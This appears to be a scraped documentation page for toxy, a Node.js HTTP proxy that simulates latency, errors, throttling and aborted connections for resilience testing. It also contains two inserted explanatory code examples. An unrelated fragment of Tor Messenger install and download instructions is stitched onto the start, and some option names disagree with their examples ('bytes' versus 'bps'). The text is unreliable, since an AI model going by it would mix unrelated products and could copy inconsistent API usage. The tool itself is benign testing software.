On Linux, extract the bundle(s) and then run: ./start-tor-messenger.desktop
On OS X, copy the Tor Messenger application from the disk image to your local disk before running it.


On all platforms, Tor Messenger sets the profile folder for
Firefox/Instantbird to the installation directory.
Note that as a policy, unencrypted one-to-one
conversations are not allowed and your messages will not
be transmitted if the person you are talking with does not
have an OTR-enabled client. You can disable this option
in the preferences to allow unencrypted communication
but doing so is not recommended.

Download Tor Messenger:
Linux (32-bit)
Linux (64-bit)
Windows
OS X (Mac)

TOXY - HACKABLE HTTP PROXY TO SIMULATE SERVER FAILURE SCENARIOS AND NETWORK CONDITIONS

Toxy is a fully programmatic and hackable HTTP proxy to simulate server failure scenarios and unexpected network conditions, built for node.js / io.js.
It was mainly designed for fuzzing/evil testing purposes, where toxy becomes particularly useful to exercise the fault tolerance and resiliency capabilities of a system, especially in disruption-tolerant networks and service-oriented architectures, where toxy may act as a MitM proxy between services.
toxy allows you to plug in poisons, optionally filtered by rules,
which essentially can intercept and alter the HTTP flow as you
need, performing multiple evil actions in the middle of that
process, such as limiting the bandwidth, delaying TCP packets,
injecting network jitter latency or replying with a custom error or
status code. It operates only at L7 (application level).
toxy can be used fluently, either programmatically or via its HTTP API. It was built on top of rocky, a full-featured middleware-oriented HTTP proxy, and it's also pluggable into connect / express as standard middleware.
Requires node.js +0.12 or io.js +1.6
Features

Full-featured HTTP/S proxy (backed by rocky and http-proxy)
Hackable and elegant programmatic API (inspired on
connect/express)
Admin HTTP API for external management and dynamic
configuration
Featured built-in router with nested configuration
Hierarchical and composable poisoning with rule based
filtering
Hierarchical middleware layer (both global and route scopes)
Easily augmentable via middleware (based on connect/
express middleware)
Supports both incoming and outgoing traffic poisoning
Built-in poisons (bandwidth, error, abort, latency, slow
read...)
Rule-based poisoning (probabilistic, HTTP method,
headers, body...)
Supports third-party poisons and rules
Built-in balancer and traffic interceptor via middleware
Inherits API and features from rocky
Compatible with connect/express (and most of their
middleware)
Able to run as standalone HTTP proxy

Introduction

Why toxy?
There are other solutions similar to toxy, but most of them do not provide proper programmatic control, are not easy to hack or configure, or are closed to extensibility.
Furthermore, the majority of those solutions operate only at the TCP transport level (L4) instead of providing high-level abstractions for the common requirements of the HTTP application-layer (L7) protocol, which is what toxy tries to provide.
toxy brings a powerful, hackable and extensible solution with a convenient abstraction, without losing a proper low-level interface to deal with HTTP protocol primitives easily.
toxy was designed around composition, simplicity and extensibility. Via its built-in hierarchical, domain-specific middleware layer you can easily augment toxy's features to your own needs.

Concepts
toxy introduces two directives: poisons and rules.
Poisons are the specific logic which infects an incoming or outgoing HTTP transaction (e.g. injecting latency, replying with an error). One HTTP transaction can be poisoned by one or multiple poisons, and those poisons can be configured to infect either global or route-level traffic.
Rules are match filters that inspect an HTTP request/response in order to determine whether the HTTP transaction should be poisoned or not (e.g. if the headers, query params, method or body match). Rules can be reused and applied to both incoming and outgoing traffic flows, at different scopes: global, route or poison level.
How it works

  ( Incoming request )
          |||
    +-------------+
    | Toxy Router |  -> Match the incoming request
    +-------------+
          |||
    +--------------------+
    |   Incoming phase   |  -> The proxy receives the request from the client
    |~~~~~~~~~~~~~~~~~~~~|
    |  ----------------  |
    |  |  Exec Rules  |  |  -> Apply configured rules for the incoming request
    |  ----------------  |
    |        |||         |
    |  ----------------  |
    |  | Exec Poisons |  |  -> If all rules passed, then poison the HTTP flow
    |  ----------------  |
    +~~~~~~~~~~~~~~~~~~~~+
    +--------------------+
    |   HTTP dispatcher  |  -> Forward the HTTP traffic to the target server, either poisoned or not
    +--------------------+
    +--------------------+
    |   Outgoing phase   |  -> Receives the response from the target server
    |~~~~~~~~~~~~~~~~~~~~|
    |  ----------------  |
    |  |  Exec Rules  |  |  -> Apply configured rules for the outgoing response
    |  ----------------  |
    |        |||         |
    |  ----------------  |
    |  | Exec Poisons |  |  -> If all rules passed, then poison the HTTP flow before sending it to the client
    |  ----------------  |
    +~~~~~~~~~~~~~~~~~~~~+
          |||
  ( Send to the client )  -> Finally, send the response to the client, either poisoned or not
Usage

Installation

npm install toxy

Examples
See examples directory for more use cases.
var toxy = require('toxy')
var poisons = toxy.poisons
var rules = toxy.rules

// Create a new toxy proxy
var proxy = toxy()

// Default server to forward incoming traffic
proxy
  .forward('http://httpbin.org')

// Register global poisons and rules
proxy
  .poison(poisons.latency({ jitter: 500 }))
  .rule(rules.probability(25))

// Register multiple routes
proxy
  .get('/download/*')
  .forward('http://files.myserver.net')
  .poison(poisons.bandwidth({ bps: 1024 }))
  .withRule(rules.headers({ 'Authorization': /^Bearer (.*)$/i }))

// Infect outgoing traffic only (after the server replied properly)
proxy
  .get('/image/*')
  .outgoingPoison(poisons.bandwidth({ bps: 512 }))
  .withRule(rules.method('GET'))
  .withRule(rules.timeThreshold({ duration: 1000, threshold: 1000 * 10 }))
  .withRule(rules.responseStatus({ range: [200, 400] }))

proxy
  .all('/api/*')
  .poison(poisons.rateLimit({ limit: 10, threshold: 1000 }))
  .withRule(rules.method(['POST', 'PUT', 'DELETE']))
  // And use a different, more permissive poison for GET requests
  .poison(poisons.rateLimit({ limit: 50, threshold: 1000 }))
  .withRule(rules.method('GET'))

// Handle the rest of the traffic
proxy
  .all('/*')
  .poison(poisons.slowClose({ delay: 1000 }))
  .poison(poisons.slowRead({ bps: 128 }))
  .withRule(rules.probability(50))

proxy.listen(3000)
console.log('Server listening on port:', 3000)
console.log('Test it:', 'http://localhost:3000/image/jpeg')

Poisons

Poisons host the specific logic which intercepts and mutates, wraps, modifies and/or cancels an HTTP transaction in the proxy server. Poisons can be applied to the incoming flow, the outgoing flow, or both.
Poisons can be composed and reused for different HTTP scenarios. They are executed in FIFO order and asynchronously.
Poisoning scopes
toxy has a hierarchical design based on two different scopes: global and route.
Global scope covers all the incoming HTTP traffic received by the proxy server, regardless of the HTTP method or path.
Route scope covers any incoming traffic which matches a specific HTTP verb and URI path.
Poisons can be plugged into both scopes, meaning you can operate with better accuracy and restrict the scope of the poisoning; for instance, you might want to apply a bandwidth-limit poison only to certain routes, such as /download or /images.
See routes.js for a featured example.
Poisoning phases
Poisons can be plugged into the incoming or outgoing traffic flow, or both.
Incoming poisoning is applied when the traffic has been received by the proxy but has not been forwarded to the target server yet.
Outgoing poisoning refers to traffic that has already been forwarded to the target server: the proxy has received the response from it, but that response has not been sent to the client yet.
This means, essentially, that you can plug in your poisons to infect the HTTP traffic before the request is forwarded to the target HTTP server, or before the response is sent to the client.
This allows more accurate poisoning based on the request or on the server response. For instance, given the nature of some poisons, like inject error, you may want to enable it according to the target server response (e.g. whether some header is present or not).
See poison-phases.js for a featured example.
Built-in poisons
Latency
Name: latency
Poisoning phase: incoming / outgoing
Reaches the server: true
Infects the HTTP flow by injecting a latency jitter in the response.
Arguments:
options object
  jitter number - Jitter value in milliseconds
  max number - Random jitter maximum value
  min number - Random jitter minimum value
toxy.poison(toxy.poisons.latency({ jitter: 1000 }))
// Or alternatively using a random value
toxy.poison(toxy.poisons.latency({ max: 1000, min: 100 }))

Inject response
Name: inject
Poisoning phase: incoming / outgoing
Reaches the server: false (only as incoming poison)
Injects a custom response, intercepting the request before sending it to the target server. Useful to simulate errors originated in the server.
Arguments:
options object
  code number - Response HTTP status code. Default 500
  headers object - Optional headers to send
  body mixed - Optional body data to send. It can be a buffer or string
  encoding string - Body encoding. Default to utf8
toxy.poison(toxy.poisons.inject({
  code: 503,
  body: '{"error": "toxy injected error"}',
  headers: {'Content-Type': 'application/json'}
}))

Bandwidth
Name: bandwidth
Poisoning phase: incoming / outgoing
Reaches the server: true
Limits the amount of bytes sent over the network in outgoing HTTP traffic for a specific time frame.
This poison is basically an alias to throttle.
Arguments:
options object
  bytes number - Amount of bytes per chunk to send. Default 1024
  threshold number - Packets time frame in milliseconds. Default 1000
toxy.poison(toxy.poisons.bandwidth({ bytes: 512 }))

Rate limit
Name: rateLimit
Poisoning phase: incoming / outgoing
Reaches the server: true
Limits the amount of requests received by the proxy in a specific threshold time frame. Designed to test API limits. Exposes the typical X-RateLimit-* headers.
Note that this is a very simple rate limit implementation: limits are stored in-memory, therefore they are completely volatile and not shared between processes. There are a bunch of featured and consistent rate limiter implementations in npm that you can plug in as a poison. You might also be interested in the token bucket algorithm.
Arguments:
options object
  limit number - Total amount of requests. Default to 10
  threshold number - Limit time frame in milliseconds. Default to 1000
  message string - Optional error message when the limit is reached.
  code number - HTTP status code when the limit is reached. Default to 429.
toxy.poison(toxy.poisons.rateLimit({ limit: 5, threshold: 10 * 1000 }))
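The built-in poison is a fixed-window counter; the text points at the token bucket algorithm as the better choice. The following is an added example, not toxy's own code: a token-bucket rate limiter written in the poison middleware shape function (req, res, next), so it could be registered with poison() like the built-ins. Per-client buckets keyed by req.socket.remoteAddress, the injectable now clock and the simulate harness with its fake request/response objects are assumptions made for this example; the traffic it replays is constructed inline.

```javascript
// Added example (not part of toxy): a token-bucket rate limiter in toxy's
// poison middleware shape. Assumptions: per-client buckets keyed by
// req.socket.remoteAddress, an injectable `now` clock (ms) for testing,
// and X-RateLimit-* / Retry-After headers on the response.
function tokenBucketRateLimit(opts) {
  opts = opts || {}
  var capacity = opts.limit || 10        // tokens in a full bucket (max burst)
  var refillMs = opts.threshold || 1000  // time for an empty bucket to refill completely
  var code = opts.code || 429
  var message = opts.message || 'Too Many Requests'
  var now = opts.now || Date.now
  var buckets = Object.create(null)      // client key -> { tokens, updated }

  // Refill a client's bucket proportionally to the elapsed time, capped at capacity
  function bucketFor(key, t) {
    var b = buckets[key]
    if (!b) b = buckets[key] = { tokens: capacity, updated: t }
    var elapsed = t - b.updated
    if (elapsed > 0) {
      b.tokens = Math.min(capacity, b.tokens + (elapsed * capacity) / refillMs)
      b.updated = t
    }
    return b
  }

  // Named function: toxy uses the name to get/enable/disable/remove a poison
  return function rateLimit(req, res, next) {
    var t = now()
    var key = (req.socket && req.socket.remoteAddress) || 'global'
    var b = bucketFor(key, t)
    res.setHeader('X-RateLimit-Limit', String(capacity))
    if (b.tokens >= 1) {
      b.tokens -= 1
      res.setHeader('X-RateLimit-Remaining', String(Math.floor(b.tokens)))
      return next()  // under the limit: let the request reach the target server
    }
    // Over the limit: answer here and never call next(), so the target is not reached
    var waitMs = ((1 - b.tokens) * refillMs) / capacity  // time until one token is back
    res.setHeader('X-RateLimit-Remaining', '0')
    res.setHeader('Retry-After', String(Math.ceil(waitMs / 1000)))
    res.statusCode = code
    res.end(message)
  }
}

// Minimal stand-ins for node's IncomingMessage / ServerResponse (constructed for the demo)
function fakeRequest(ip) {
  return { method: 'GET', url: '/api/items', headers: {}, socket: { remoteAddress: ip } }
}
function fakeResponse() {
  var res = { statusCode: 200, headers: {}, body: null }
  res.setHeader = function (name, value) { res.headers[name.toLowerCase()] = value }
  res.end = function (body) { res.body = body }
  return res
}

// Replay one request per timestamp (ms) from a single client through the poison
// and record whether it was forwarded plus the status and headers it received.
function simulate(timestamps, limitOpts) {
  var clock = 0
  var poison = tokenBucketRateLimit(Object.assign({ now: function () { return clock } }, limitOpts))
  return timestamps.map(function (t) {
    clock = t
    var res = fakeResponse()
    var forwarded = false
    poison(fakeRequest('10.0.0.1'), res, function () { forwarded = true })
    return {
      forwarded: forwarded,
      status: res.statusCode,
      remaining: res.headers['x-ratelimit-remaining'],
      retryAfter: res.headers['retry-after']
    }
  })
}

// A burst of 4 at t=0 against a limit of 3, then one more after a full refill
console.log(simulate([0, 0, 0, 0, 1000], { limit: 3, threshold: 1000 }))
```

The fourth request in the burst gets 429 with Retry-After: 1 and is never forwarded; after the bucket has refilled the fifth one passes again. Because the state is in-memory, the same caveat as for the built-in applies: it is per process and lost on restart.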

Slow read
Name: slowRead
Poisoning phase: incoming
Reaches the server: true
Reads incoming payload data packets slowly. Only valid for non-GET requests (requests that carry a body).
Arguments:
options object
  chunk number - Packet chunk size in bytes. Default to 1024
  threshold number - Limit threshold time frame in milliseconds. Default to 1000
toxy.poison(toxy.poisons.slowRead({ chunk: 2048, threshold: 1000 }))

Slow open
Name: slowOpen
Poisoning phase: incoming
Reaches the server: true
Delays the HTTP connection ready state.
Arguments:
options object
  delay number - Connection delay in milliseconds. Default to 1000
toxy.poison(toxy.poisons.slowOpen({ delay: 2000 }))

Slow close
Name: slowClose
Poisoning phase: incoming / outgoing
Reaches the server: true
Delays the HTTP connection close signal (EOF).
Arguments:
options object
  delay number - Delay time in milliseconds. Default to 1000
toxy.poison(toxy.poisons.slowClose({ delay: 2000 }))

Throttle
Name: throttle
Poisoning phase: incoming / outgoing
Reaches the server: true
Restricts the amount of packets sent over the network in a specific threshold time frame.
Arguments:
options object
  chunk number - Packet chunk size in bytes. Default to 1024
  delay number - Delay between data chunks in milliseconds. Default to 100
toxy.poison(toxy.poisons.throttle({ chunk: 2048, delay: 100 }))

Abort connection
Name: abort
Poisoning phase: incoming / outgoing
Reaches the server: false (only as incoming poison)
Aborts the TCP connection. From the low-level perspective, this destroys the socket on the proxy server, operating only at TCP level without sending any HTTP application-level data.
Arguments:
options object
  delay number - Aborts the TCP connection after waiting the given milliseconds. Default to 0
  next boolean - If true, the connection will be aborted only if the target server takes longer than the delay param to reply. Default to false
  error Error - Custom internal node.js error to use when destroying the socket. Default to null
// Basic connection abort
toxy.poison(toxy.poisons.abort())
// Abort after a delay
toxy.poison(toxy.poisons.abort(1000))
// In this case, the socket will be closed if
// the target server takes more than
// 2 seconds to respond
toxy.poison(toxy.poisons.abort({ delay: 2000, next: true }))

Timeout
Name: timeout
Poisoning phase: incoming / outgoing
Reaches the server: true
Defines a response timeout. Useful when forwarding to potentially slow servers.
Arguments:
milliseconds number - Timeout limit in milliseconds
toxy.poison(toxy.poisons.timeout(5000))

How to write poisons
Poisons are implemented as standalone middleware (like in connect/express).
Here's a simple example of a server latency poison:
var toxy = require('toxy')

function customLatency(delay) {
  /**
   * We name the function since toxy uses it as
   * identifier to get/disable/remove it in the future
   */
  return function customLatency(req, res, next) {
    var timeout = setTimeout(clean, delay)
    req.once('close', onClose)

    // The client went away while we were delaying: stop the timer and abort the chain
    function onClose() {
      clearTimeout(timeout)
      next('client connection closed')
    }

    // Delay elapsed: drop the listener and let the request continue
    function clean() {
      req.removeListener('close', onClose)
      next()
    }
  }
}

var proxy = toxy()

// Register and enable the poison
proxy
  .get('/foo')
  .poison(customLatency(2000))

You can optionally extend the built-in poisons with your own poisons:
toxy.addPoison(customLatency)
// Then you can use it as a built-in poison
proxy
  .get('/foo')
  .poison(toxy.poisons.customLatency(2000))

For featured real examples, take a look at the built-in poisons implementation.
Rules
Rules are simple validation filters which inspect incoming or outgoing HTTP traffic in order to determine, given certain conditions (e.g. matches on the method, headers, query params, body...), whether the current HTTP transaction should be poisoned or not, based on the resolution value of the rule.
Rules are useful to compose, decouple and reuse logic among different poisoning scenarios. Rules can be applied at global, route or even poison scope, and they apply to both phases of poisoning.
Rules are executed in FIFO order. Their evaluation logic is equivalent to Array#every() in JavaScript: all the rules must pass in order to proceed with the poisoning.
Built-in rules
Probability
Name: probability
Poison phase: incoming / outgoing
Enables the rule with a random probability. Useful for random poisoning.
Arguments:
percentage number - Percentage of filtering. Default 50
var rule = toxy.rules.probability(85)
toxy.rule(rule)

Time threshold
Name: timeThreshold
Poison phase: incoming / outgoing
Simple rule to enable poisons based on a specific time threshold and duration. For instance, you can enable certain poisons during a specific amount of time (e.g. 1 second) within a time threshold (e.g. 1 minute).
Arguments:
options object
  duration number - Enable time interval in milliseconds. Default to 1000
  threshold number - Time threshold in milliseconds to wait before re-enabling the poisoning. Default to 10000
// Enable the poisoning only 100 milliseconds per each 10 seconds
proxy.rule(toxy.rules.timeThreshold(100))
// Enable poisoning during 1 second every minute
proxy.rule(toxy.rules.timeThreshold({ duration: 1000, threshold: 1000 * 60 }))

Method
Name: method
Poison phase: incoming / outgoing
Filters by HTTP method.
Arguments:
method string|array - Method or methods to filter.
var method = toxy.rules.method(['GET', 'POST'])
toxy.rule(method)

Content Type
Name: contentType
Filters by the Content-Type header, which must be present.
Arguments:
value string|regexp - Header value to match.
var rule = toxy.rules.contentType('application/json')
toxy.rule(rule)

Headers
Name: headers
Poison phase: incoming / outgoing
Filters by request headers.
Arguments:
headers object - Headers to match by key-value pair. value can be a string, regexp, boolean or function(headerValue, headerName) => boolean
var matchHeaders = {
  'content-type': /^application\/json/i,
  'server': true, // meaning it should be present
  'accept': function (value, key) {
    return value.indexOf('text') !== -1
  }
}
var rule = toxy.rules.headers(matchHeaders)
toxy.rule(rule)

Response headers
Name: responseHeaders
Poison phase: outgoing
Filters by response headers from the target server. Same as the headers rule, but evaluating the outgoing response.
Arguments:
headers object - Headers to match by key-value pair. value can be a string, regexp, boolean or function(headerValue, headerName) => boolean
var matchHeaders = {
  'content-type': /^application\/json/i,
  'server': true, // meaning it should be present
  'accept': function (value, key) {
    return value.indexOf('text') !== -1
  }
}
var rule = toxy.rules.responseHeaders(matchHeaders)
toxy.rule(rule)

Body
Name: body
Poison phase: incoming / outgoing
Matches the incoming body payload by a given string, regexp or custom filter function.
This rule is pretty simple, so for complex body matching (e.g. validating against a JSON schema) you should probably write your own rule.
Arguments:
match string|regexp|function - Body content to match
limit string - Optional. Body limit in human size. E.g. 5mb
encoding string - Body encoding. Default to utf8
length number - Body length. Default taken from the Content-Length header
var rule = toxy.rules.body('"hello":"world"')
toxy.rule(rule)
// Or using a filter function returning a boolean
var rule = toxy.rules.body(function contains(body) {
  return body.indexOf('hello') !== -1
})
toxy.rule(rule)

Response body
Name: responseBody
Poison phase: outgoing
Matches the outgoing body payload by a given string, regexp or custom filter function.
Arguments:
match string|regexp|function - Body content to match
encoding string - Body encoding. Default to utf8
length number - Body length. Default taken from the Content-Length header
var rule = toxy.rules.responseBody('"hello":"world"')
toxy.rule(rule)
// Or using a filter function returning a boolean
var rule = toxy.rules.responseBody(function contains(body) {
  return body.indexOf('hello') !== -1
})
toxy.rule(rule)

Response status
Name: responseStatus
Poison phase: outgoing
Evaluates the response status from the target server. Only applicable to outgoing poisons.
Arguments:
range array - Pair of status codes defining the range to match. Default [200, 300].
lower number - Match status codes lower than this value. Default to null.
higher number - Match status codes higher than this value. Default to null.
value number - Status code to match using a strict equality comparison. Default null.
include array - Unordered list of status codes to match. Useful to specify custom statuses. Default null
// Strict evaluation of the status code
toxy.rule(toxy.rules.responseStatus(200))
// Using a range of valid statuses
toxy.rule(toxy.rules.responseStatus([200, 204]))
// Using relational comparison
toxy.rule(toxy.rules.responseStatus({ higher: 199, lower: 400 }))
// Custom unordered status codes to match
toxy.rule(toxy.rules.responseStatus({ include: [200, 204, 400, 404] }))

Third-party rules
List of available third-party rules provided by the community. PRs are welcome.
IP - Enable/disable poisons based on the client IP address (supports CIDR, subnets, ranges...).
How to write rules
Rules are simple middleware functions that resolve asynchronously with a boolean value to determine whether a given HTTP transaction should be ignored when poisoning.
Your rule must resolve with a boolean param by calling the middleware's next(err, shouldIgnore) function, passing true if the rule did not match and the poisoning should not be applied, which then continues with the next middleware in the stack.
Here's an example of a simple rule matching the HTTP method to determine whether the transaction should be poisoned:
var toxy = require('toxy')

function customMethodRule(matchMethod) {
  /**
   * We name the function since it's used by toxy to
   * identify the rule to get/disable/remove it in the future
   */
  return function customMethodRule(req, res, next) {
    var shouldIgnore = req.method !== matchMethod
    next(null, shouldIgnore)
  }
}

var proxy = toxy()

// Register and enable the rule
proxy
  .get('/foo')
  .rule(customMethodRule('GET'))
  .poison(/* ... */)

You can optionally extend the built-in rules with your own rules:
toxy.addRule(customMethodRule)
// Then you can use it as a built-in rule
proxy
  .get('/foo')
  .rule(toxy.rules.customMethodRule('GET'))

For featured real examples, take a look at the built-in rules implementation.
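The evaluation order the Rules and How-to-write sections describe (rules in FIFO order with Array#every semantics, poisons in FIFO order only when every rule matched, a poison that answers the client itself not calling next(), directives addressable by their function name) is modelled in the following added example so it can be run offline. It is not toxy's code: Directive, evalRules, runPoisons, runPhase and demo are names chosen here, and the sample rules and poisons are synchronous so the run is deterministic.

```javascript
// Added example (not toxy's own code): a minimal model of how rules gate
// poisons. Rules are middleware calling next(err, shouldIgnore); poisons are
// middleware calling next(err), or ending the response and not calling next().
function Directive(fn) {
  if (typeof fn !== 'function' || !fn.name) {
    throw new TypeError('directives must be named functions (the name is the identifier)')
  }
  this.name = fn.name
  this.fn = fn
  this.enabled = true
  this.rules = []       // poison-level rules (only meaningful for poisons)
}
Directive.prototype.rule = function (fn) { this.rules.push(new Directive(fn)); return this }
Directive.prototype.enable = function () { this.enabled = true; return this }
Directive.prototype.disable = function () { this.enabled = false; return this }

// Evaluate rules in FIFO order with Array#every semantics: stop at the first
// enabled rule that says "ignore". Calls done(err, shouldIgnore).
function evalRules(rules, req, res, done) {
  var i = 0
  function step(err, shouldIgnore) {
    if (err) return done(err)
    if (shouldIgnore) return done(null, true)
    var r = rules[i++]
    while (r && !r.enabled) r = rules[i++]   // disabled rules are skipped
    if (!r) return done(null, false)
    r.fn(req, res, step)
  }
  step(null, false)
}

// Run enabled poisons in FIFO order, checking each poison's own rules first.
// A poison that ends the response does not call next(), so the chain stops there.
function runPoisons(poisons, req, res, done) {
  var i = 0
  function step(err) {
    if (err) return done(err)
    var p = poisons[i++]
    while (p && !p.enabled) p = poisons[i++]
    if (!p) return done(null)
    evalRules(p.rules, req, res, function (err, ignore) {
      if (err) return done(err)
      if (ignore) return step(null)   // this poison is skipped, try the next one
      p.fn(req, res, step)
    })
  }
  step(null)
}

// One phase at one scope: scope-level rules gate the poison list.
// done(err, outcome) with outcome 'rules-not-matched' or 'poisoned';
// done is never reached when a poison answered the client itself.
function runPhase(phase, req, res, done) {
  evalRules(phase.rules, req, res, function (err, ignore) {
    if (err) return done(err)
    if (ignore) return done(null, 'rules-not-matched')
    runPoisons(phase.poisons, req, res, function (err) { done(err, err ? null : 'poisoned') })
  })
}

// Sample rules and poisons (synchronous so the run is deterministic)
function methodRule(method) {
  return function methodRule(req, res, next) { next(null, req.method !== method) }
}
function headerPresentRule(name) {
  return function headerPresentRule(req, res, next) { next(null, !(name in req.headers)) }
}
function tagPoison(tag) {
  return function tagPoison(req, res, next) { res.trace.push(tag); next() }
}
function injectPoison(code) {
  return function injectPoison(req, res, next) {
    res.statusCode = code
    res.trace.push('inject:' + code)
    // no next(): the request must never reach the target server
  }
}

// Phase under test: only POST traffic is poisoned; the 503 injection fires only
// when the client sent an x-chaos header. `disabled` lists poison names to switch off.
function demo(req, disabled) {
  var res = { statusCode: 200, trace: [] }
  var phase = {
    rules: [new Directive(methodRule('POST'))],
    poisons: [
      new Directive(tagPoison('latency')),
      new Directive(injectPoison(503)).rule(headerPresentRule('x-chaos')),
      new Directive(tagPoison('slowClose'))
    ]
  }
  var off = disabled || []
  phase.poisons.forEach(function (p) { if (off.indexOf(p.name) !== -1) p.disable() })
  var outcome = null
  runPhase(phase, req, res, function (err, result) { outcome = err ? 'error' : result })
  return { outcome: outcome, statusCode: res.statusCode, trace: res.trace }
}

console.log(demo({ method: 'POST', headers: { 'x-chaos': '1' } }))
```

A GET never gets past the scope rule; a plain POST is poisoned by latency and slowClose; a POST with x-chaos is answered with 503 by injectPoison, so slowClose never runs and outcome stays null; disabling injectPoison by name restores the full chain.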
Programmatic API
The toxy API is completely built on top of the rocky API. In other words, you can use any of the methods, features and middleware layer natively provided by rocky.
toxy([ options ])
Create a new toxy proxy.
For supported options, please see the rocky documentation.
var toxy = require('toxy')
var proxy = toxy({ forward: 'http://server.net', timeout: 30000 })

proxy
  .get('/foo')
  .poison(toxy.poisons.latency(1000))
  .withRule(toxy.rules.contentType('json'))
  .forward('http://foo.server')

proxy
  .post('/bar')
  .poison(toxy.poisons.bandwidth({ bps: 1024 }))
  .withRule(toxy.rules.probability(50))
  .forward('http://bar.server')

proxy
  .get('/boo')
  .outgoingPoison(toxy.poisons.bandwidth({ bps: 1024 }))
  .withRule(toxy.rules.method('GET'))
  .forward('http://boo.server')

proxy.all('/*')
proxy.listen(3000)

toxy#get(path, [ middleware... ])
Return: ToxyRoute
Register a new route for GET method.
toxy#post(path, [ middleware... ])
Return: ToxyRoute
Register a new route for POST method.
toxy#put(path, [ middleware... ])
Return: ToxyRoute
Register a new route for PUT method.
toxy#patch(path, [ middleware... ])
Return: ToxyRoute
Register a new route for PATCH method.
toxy#delete(path, [ middleware... ])
Return: ToxyRoute
Register a new route for DELETE method.
toxy#head(path, [ middleware... ])
Return: ToxyRoute
Register a new route for HEAD method.
toxy#all(path, [ middleware... ])
Return: ToxyRoute
Register a new route for any method.
toxy#poisons => Object
Exposes a map with the built-in poisons. Prototype alias to toxy.poisons
toxy#rules => Object
Exposes a map with the built-in rules. Prototype alias to toxy.rules

toxy#forward(url)
Define a URL to forward the incoming traffic received by the
proxy.
toxy#balance(urls)
Forward to multiple servers balancing among them.
For more information, see the rocky docs
toxy#replay(url)
Define a new replay server. You can call this method multiple
times to define multiple replay servers.
For more information, see the rocky docs
toxy#use(middleware)
Plug in a custom middleware.
For more information, see the rocky docs.
toxy#useResponse(middleware)
Plug in a response outgoing traffic middleware.
For more information, see the rocky docs .
toxy#useReplay(middleware)
Plug in a replay traffic middleware.
For more information, see the rocky docs
toxy#requestBody(middleware)
Intercept incoming request body. Useful to modify it on the fly.
For more information, see the rocky docs
toxy#responseBody(middleware)
Intercept outgoing response body. Useful to modify it on the fly.
For more information, see the rocky docs
toxy#middleware()
Return a standard middleware to use with connect/express.
toxy#host(host)
Overwrite the Host header with a custom value. Similar to
forwardHost option.
toxy#redirect(url)
Redirect traffic to the given URL.
toxy#findRoute(routeIdOrPath, [ method ])
Find a route by ID or path and method.
toxy#listen(port)
Starts the built-in HTTP server, listening on a specific TCP port.
toxy#close([ callback ])
Closes the HTTP server.
toxy#poison(poison)
Alias: usePoison , useIncomingPoison
Register a new poison to infect incoming traffic.
toxy#outgoingPoison(poison)
Alias: useOutgoingPoison , responsePoison
Register a new poison to infect outgoing traffic.
toxy#rule(rule)
Alias: useRule
Register a new rule.
toxy#withRule(rule)
Aliases: poisonRule , poisonFilter
Apply a new rule for the latest registered poison.
toxy#enable(poison)
Enable a poison by name identifier
toxy#disable(poison)
Disable a poison by name identifier
toxy#remove(poison)
Return: boolean
Remove poison by name identifier.
toxy#isEnabled(poison)
Return: boolean
Checks if a poison is enabled by name identifier.
toxy#disableAll()
Alias: disablePoisons
Disable all the registered poisons.

toxy#getPoison(name)
Return: Directive|null
Searches and retrieves a registered poison in the stack by name identifier.
toxy#getIncomingPoison(name)
Return: Directive|null
Searches and retrieves a registered incoming poison in the stack by name identifier.
toxy#getOutgoingPoison(name)
Return: Directive|null
Searches and retrieves a registered outgoing poison in the stack by name identifier.
toxy#getPoisons()
Return: array<Directive>
Return an array of registered poisons.
toxy#getIncomingPoisons()
Return: array<Directive>
Return an array of registered incoming poisons.
toxy#getOutgoingPoisons()
Return: array<Directive>
Return an array of registered outgoing poisons.
toxy#flush()
Alias: flushPoisons
Remove all the registered poisons.
toxy#enableRule(rule)
Enable a rule by name identifier.
toxy#disableRule(rule)
Disable a rule by name identifier.

toxy#removeRule(rule)
Return: boolean
Remove a rule by name identifier.
toxy#disableRules()
Disable all the registered rules.
toxy#isRuleEnabled(rule)
Return: boolean
Checks if the given rule is enabled by name identifier.
toxy#getRule(rule)
Return: Directive|null
Searches and retrieves a registered rule in the stack by name identifier.
toxy#getRules()
Return: array<Directive>
Returns an array with the registered rules wrapped as Directive.
toxy#flushRules()
Remove all the rules.
toxy.addPoison(name, fn)
Extend built-in poisons.
toxy.addRule(name, fn)
Extend built-in rules.
toxy.poisons => Object
Exposes a map with the built-in poisons.
toxy.rules => Object
Exposes a map with the built-in rules.

toxy.VERSION => String
Current toxy semantic version.
ToxyRoute
ToxyRoute exposes the same interface as the global Toxy interface; it just adds some additional route-level methods.
Further actions you perform against the ToxyRoute API will only be applicable at route level (nested). In other words: you already know the API.
This example will probably clarify possible doubts:
var toxy = require('toxy')
var proxy = toxy()
// Now using the global API
proxy
.forward('http://server.net')
.poison(toxy.poisons.bandwidth({ bps: 1024 }))
.rule(toxy.rules.method('GET'))
// Now create a route
var route = proxy
.get('/foo')
.toPath('/bar') // Route-level API method
.host('server.net') // Route-level API method
.forward('http://new.server.net')
// Now using the ToxyRoute interface
route
.poison(toxy.poisons.bandwidth({ bps: 512 }))
.rule(toxy.rules.contentType('json'))

Directive(middlewareFn)
A convenient wrapper internally used for poisons and rules.
Normally you don't need to know this interface, but it might be
useful for hacking purposes or more low-level actions.
Directive#enable()
Return: boolean
Directive#disable()
Return: boolean
Directive#isEnabled()
Return: boolean
Directive#rule(rule)
Alias: filter
Directive#handler()
Return: function(req, res, next)
HTTP API
The toxy HTTP API follows the JSON API conventions,
including resource based hypermedia linking.
Usage
For a featured use case, see the admin server example.
const toxy = require('toxy')
// Create the toxy admin server
var admin = toxy.admin({ cors: true })
admin.listen(9000)
// Create the toxy proxy
var proxy = toxy()
proxy.listen(3000)
// Add the toxy instance to be managed by the admin server
admin.manage(proxy)
// Then configure the proxy
proxy
  .forward('http://my.target.net')
proxy
  .get('/slow')
  .poison(toxy.poisons.bandwidth({ bps: 1024 }))
// Handle the rest of the traffic
proxy
  .all('/*')
  .poison(toxy.poisons.bandwidth({ bps: 1024 * 5 }))
console.log('toxy proxy listening on port:', 3000)
console.log('toxy admin server listening on port:', 9000)

For more details about the admin programmatic API, see


below .
Authorization
The HTTP API can be protected to unauthorized clients.
Authorized clients must define the API key token via API-Key
or Authorization HTTP headers.
To enable it, you should simple pass the following options to
toxy admin server:
const toxy = require('toxy')
const opts = { apiKey: 's3cr3t' }
var admin = toxy.admin(opts)
admin.listen(9000)
console.log('protected toxy admin server listening on port:', 9000)
